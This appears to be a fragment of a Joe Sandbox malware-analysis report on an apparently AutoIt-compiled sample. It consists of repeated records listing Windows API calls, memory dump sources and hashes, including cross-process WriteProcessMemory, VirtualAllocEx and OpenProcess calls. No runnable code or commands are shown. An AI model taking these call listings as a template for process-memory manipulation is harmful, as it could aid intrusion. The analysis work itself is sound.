                                                                              • Part of subcall function 00804750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00804743,?,?,008037AE,?), ref: 00804770
                                                                            • CoInitialize.OLE32(00000000), ref: 0086B9BB
                                                                            • CoCreateInstance.OLE32(00892D6C,00000000,00000001,00892BDC,?), ref: 0086B9D4
                                                                            • CoUninitialize.OLE32 ref: 0086B9F1
                                                                              • Part of subcall function 00809837: __itow.LIBCMT ref: 00809862
                                                                              • Part of subcall function 00809837: __swprintf.LIBCMT ref: 008098AC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                            • String ID: .lnk
                                                                            • API String ID: 2126378814-24824748
                                                                            • Opcode ID: 6956cde6a23294a379ed27c3f3145366c952416309ca50d7128bd39acef84191
                                                                            • Instruction ID: 0dbbad2cfdf70183c2f074088b4824ee9e498066706b491fd2c47b4534cabcbe
                                                                            • Opcode Fuzzy Hash: 6956cde6a23294a379ed27c3f3145366c952416309ca50d7128bd39acef84191
                                                                            • Instruction Fuzzy Hash: 73A126756042059FCB00DF18C885D5ABBE5FF89328F158958F899DB3A2CB31ED85CB92
                                                                            APIs
                                                                            • __startOneArgErrorHandling.LIBCMT ref: 008250AD
                                                                              • Part of subcall function 008300F0: __87except.LIBCMT ref: 0083012B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorHandling__87except__start
                                                                            • String ID: pow
                                                                            • API String ID: 2905807303-2276729525
                                                                            • Opcode ID: 9be3554078011b427a50aca86d879f8e7f338be5b4d296976c01e215d58a53f0
                                                                            • Instruction ID: 152adac39516eaebb9d5647bd6fcfb67cf1eacc5da16c4825a9252736c1e8bce
                                                                            • Opcode Fuzzy Hash: 9be3554078011b427a50aca86d879f8e7f338be5b4d296976c01e215d58a53f0
                                                                            • Instruction Fuzzy Hash: D551996094CA0696DB127728EC2137F3B94FB80700F248D5AE4D5C62AAEE348DD4DFC2
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: _memset$_memmove
                                                                            • String ID: ERCP
                                                                            • API String ID: 2532777613-1384759551
                                                                            • Opcode ID: 3c98c98d2feaee1ab4289fa2387999993337754541671002a56d605814254c3b
                                                                            • Instruction ID: 26f626343a63f808504c99373e7dbd1001cf3ca0762e92d0e70f0cbbfb202898
                                                                            • Opcode Fuzzy Hash: 3c98c98d2feaee1ab4289fa2387999993337754541671002a56d605814254c3b
                                                                            • Instruction Fuzzy Hash: EF519071900709DBDB24CF95C9817EAB7F8FF04314F20456EE98AD7251E770AA94CB41
                                                                            APIs
                                                                              • Part of subcall function 008614BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00859296,?,?,00000034,00000800,?,00000034), ref: 008614E6
                                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0085983F
                                                                              • Part of subcall function 00861487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008592C5,?,?,00000800,?,00001073,00000000,?,?), ref: 008614B1
                                                                              • Part of subcall function 008613DE: GetWindowThreadProcessId.USER32(?,?), ref: 00861409
                                                                              • Part of subcall function 008613DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0085925A,00000034,?,?,00001004,00000000,00000000), ref: 00861419
                                                                              • Part of subcall function 008613DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0085925A,00000034,?,?,00001004,00000000,00000000), ref: 0086142F
                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008598AC
                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008598F9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                            • String ID: @
                                                                            • API String ID: 4150878124-2766056989
                                                                            • Opcode ID: d495c7617b25856ee7e55038171bdc543c9597c126714deed70f4e39a309e2f6
                                                                            • Instruction ID: 0b6e8f1c62e4ffadd75b6ec76319b5b2bac603a5fe3da6e1fcfbefee785a8977
                                                                            • Opcode Fuzzy Hash: d495c7617b25856ee7e55038171bdc543c9597c126714deed70f4e39a309e2f6
                                                                            • Instruction Fuzzy Hash: 56413076A00218BFDF10DFA8CD45ADEBBB8FB05300F144199FA45B7151DA716E49CBA1
                                                                            APIs
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0088F910,00000000,?,?,?,?), ref: 008879DF
                                                                            • GetWindowLongW.USER32 ref: 008879FC
                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00887A0C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Long
                                                                            • String ID: SysTreeView32
                                                                            • API String ID: 847901565-1698111956
                                                                            • Opcode ID: 9db14f8df794ff4b094c34dc85463c99cd842cdf70d5a53cc7628294b9591839
                                                                            • Instruction ID: 16df269494dbf4f5c7f6bc057da27c4383780476dcd545750249eb35778d4d8c
                                                                            • Opcode Fuzzy Hash: 9db14f8df794ff4b094c34dc85463c99cd842cdf70d5a53cc7628294b9591839
                                                                            • Instruction Fuzzy Hash: D331DC31204606ABDB15AF38CC45BEA7BA9FB09334F204725F975E22E1D734ED919B50
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00887B61
                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00887B76
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: S$'
                                                                            • API String ID: 3850602802-2923080695
                                                                            • Opcode ID: adfc90dfdedd52f8a549238b83b1918b8d7f350da16e3dd83df9cb50e26a2310
                                                                            • Instruction ID: e838bdc2b2008f37cc409a2fb5c47ae4d0a4a3fd1dd4a9e3260d4838442f282d
                                                                            • Opcode Fuzzy Hash: adfc90dfdedd52f8a549238b83b1918b8d7f350da16e3dd83df9cb50e26a2310
                                                                            • Instruction Fuzzy Hash: 97410774A0521A9FDB14DF68C881BEABBB5FB09314F20016AE904EB391E770E951CF90
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00887461
                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00887475
                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00887499
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window
                                                                            • String ID: SysMonthCal32
                                                                            • API String ID: 2326795674-1439706946
                                                                            • Opcode ID: 0dea5172c6513e79bdd1c179d6e7bfc611c736619b591da2c3b4a7d57bb5a566
                                                                            • Instruction ID: a10da7a6da206fb4ab365efef056fb54f32650bc3639fcfb6e9347f25e4e545a
                                                                            • Opcode Fuzzy Hash: 0dea5172c6513e79bdd1c179d6e7bfc611c736619b591da2c3b4a7d57bb5a566
                                                                            • Instruction Fuzzy Hash: 7B218D32500218ABDF11DEA4CC46FEA3B79FB48724F210214FE55AB191DA75E8919BA0
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00886D3B
                                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00886D4B
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00886D70
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$MoveWindow
                                                                            • String ID: Listbox
                                                                            • API String ID: 3315199576-2633736733
                                                                            • Opcode ID: f871f807e46ff7d170e030b0929ea6a49a32e855e5bdf24e81157c19fd404229
                                                                            • Instruction ID: 9b2dcd002ca2ae324365e9be02416b0a60ea666613fbdd4e99a51102efff0245
                                                                            • Opcode Fuzzy Hash: f871f807e46ff7d170e030b0929ea6a49a32e855e5bdf24e81157c19fd404229
                                                                            • Instruction Fuzzy Hash: B6219532610118BFDF119F54DC45FBB377AFF89760F118124FA459B190D671AC6187A0
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00887772
                                                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00887787
                                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00887794
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: msctls_trackbar32
                                                                            • API String ID: 3850602802-1010561917
                                                                            • Opcode ID: e53319afd06d290922deef174ab57def5a7e90411a116e26e04e0a15c79ec5d9
                                                                            • Instruction ID: b53a44c34ae5a8e0d69ea07b7b75cdfb69729c71534eae5ecb2bca305d1f3357
                                                                            • Opcode Fuzzy Hash: e53319afd06d290922deef174ab57def5a7e90411a116e26e04e0a15c79ec5d9
                                                                            • Instruction Fuzzy Hash: D711E772244208BAEF206F65CC05FEB7779FF89B64F114218FA41D6190D671E851CB20
                                                                            APIs
                                                                            • GetForegroundWindow.USER32(?,008C57B0,0088D809,000000FC,?,00000000,00000000,?,?,?,0083B969,?,?,?,?,?), ref: 0088ACD1
                                                                            • GetFocus.USER32 ref: 0088ACD9
                                                                              • Part of subcall function 00802612: GetWindowLongW.USER32(?,000000EB), ref: 00802623
                                                                              • Part of subcall function 008025DB: GetWindowLongW.USER32(?,000000EB), ref: 008025EC
                                                                            • SendMessageW.USER32(00E2EE78,000000B0,000001BC,000001C0), ref: 0088AD4B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Long$FocusForegroundMessageSend
                                                                            • String ID: S
                                                                            • API String ID: 3601265619-2858979982
                                                                            • Opcode ID: 8cd7ad774292941e64f8287b89545e3c69a6f16f42860f5c25cc8ebca773a155
                                                                            • Instruction ID: fdb38f77b9e1fb2f49d2034b50d56af3f458456247db7bdca507971da87dcb90
                                                                            • Opcode Fuzzy Hash: 8cd7ad774292941e64f8287b89545e3c69a6f16f42860f5c25cc8ebca773a155
                                                                            • Instruction Fuzzy Hash: EE0152312015009FDB24EB28DC98E6677E6FB89325B18027DF525C72F1DB32AC46CB51
                                                                            APIs
                                                                            • GetSystemDirectoryW.KERNEL32(?), ref: 00841775
                                                                              • Part of subcall function 0087BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0084195E,?), ref: 0087BFFE
                                                                              • Part of subcall function 0087BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0087C010
                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0084196D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                            • String ID: 8o$WIN_XPe
                                                                            • API String ID: 582185067-1487635904
                                                                            • Opcode ID: c16f021edc6bb5da019fcf3b98605715d338468630bbbd94149e8f16f4718165
                                                                            • Instruction ID: 3285f1c3a59126b879a2fe72e0991b79f810a0d7a3d5537af48884ec861b28ef
                                                                            • Opcode Fuzzy Hash: c16f021edc6bb5da019fcf3b98605715d338468630bbbd94149e8f16f4718165
                                                                            • Instruction Fuzzy Hash: 18F01E7080100CEFCB25DBA4C988AECBBB8FB08304F600095E112E20A5DB319E84CF24
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00804BD0,?,00804DEF,?,008C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00804C11
                                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00804C23
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                            • API String ID: 2574300362-3689287502
                                                                            • Opcode ID: 9d4b261724dfb38d8a7b49550487a0b85ed7730fc99f1ead0f3e88c187cbe354
                                                                            • Instruction ID: 27f6362a9acf38959526e116ccdd6a52aa803903eeb3d87035944fa1c4be8033
                                                                            • Opcode Fuzzy Hash: 9d4b261724dfb38d8a7b49550487a0b85ed7730fc99f1ead0f3e88c187cbe354
                                                                            • Instruction Fuzzy Hash: 9BD0C270500713CFD7206F74CE0820AB6D5FF08352B008C399591C2291E6B4C880C710
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00804B83,?), ref: 00804C44
                                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00804C56
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                            • API String ID: 2574300362-1355242751
                                                                            • Opcode ID: 964b52cd7842ac7440c1238e03860a2e8d71afae76a2de60b313027393bc052f
                                                                            • Instruction ID: 97bcd6aacdd4b3ae4115fa09aafda397d66c564e2c13c99a1e5f5c8339a1877e
                                                                            • Opcode Fuzzy Hash: 964b52cd7842ac7440c1238e03860a2e8d71afae76a2de60b313027393bc052f
                                                                            • Instruction Fuzzy Hash: 9AD0C770600713CFE7209F35CD0820A72E4FF00361B10883EA6A2C62A1E674C8C0CB20
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(advapi32.dll,?,00881039), ref: 00880DF5
                                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00880E07
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                            • API String ID: 2574300362-4033151799
                                                                            • Opcode ID: f5ba3b723f7ab2539c4628ff832836e43d51ff9e946435276e9f5acd89e44e07
                                                                            • Instruction ID: 14b3ac5228bedcb64c3236145bbc1b5648c70d1425bb6507bde4afde15354120
                                                                            • Opcode Fuzzy Hash: f5ba3b723f7ab2539c4628ff832836e43d51ff9e946435276e9f5acd89e44e07
                                                                            • Instruction Fuzzy Hash: 64D0E274550722CFD761AF79C80868776E5FF04752F118C2ED696D2251E6B4D8908B50
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00878CF4,?,0088F910), ref: 008790EE
                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00879100
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: GetModuleHandleExW$kernel32.dll
                                                                            • API String ID: 2574300362-199464113
                                                                            • Opcode ID: 9e62178bf8113db74fe3e2223397d940bd3c4737a24273e58c91db6b204835c6
                                                                            • Instruction ID: de0a2b79597bec526a796cfd02a94e0c93643523670d3d1372e6a83817ce5c44
                                                                            • Opcode Fuzzy Hash: 9e62178bf8113db74fe3e2223397d940bd3c4737a24273e58c91db6b204835c6
                                                                            • Instruction Fuzzy Hash: D8D01234510713CFD7209F39D81C64676D4FF05751B51C879D5E5D6650EA78C890CB60
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: LocalTime__swprintf
                                                                            • String ID: %.3d$WIN_XPe
                                                                            • API String ID: 2070861257-2409531811
                                                                            • Opcode ID: 61dc518b69cacd326b52e97e2f1b38c8ff2243921b15add77cb8f8b7d4db8922
                                                                            • Instruction ID: 78336af2a5595c190af79073bbd07df62e9eb745dd565c2a161c13df3df6f09e
                                                                            • Opcode Fuzzy Hash: 61dc518b69cacd326b52e97e2f1b38c8ff2243921b15add77cb8f8b7d4db8922
                                                                            • Instruction Fuzzy Hash: 75D0177184511CFACF509B909C8D8F9737CFB18309F200562F622E2184E22A9BD4EB21
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
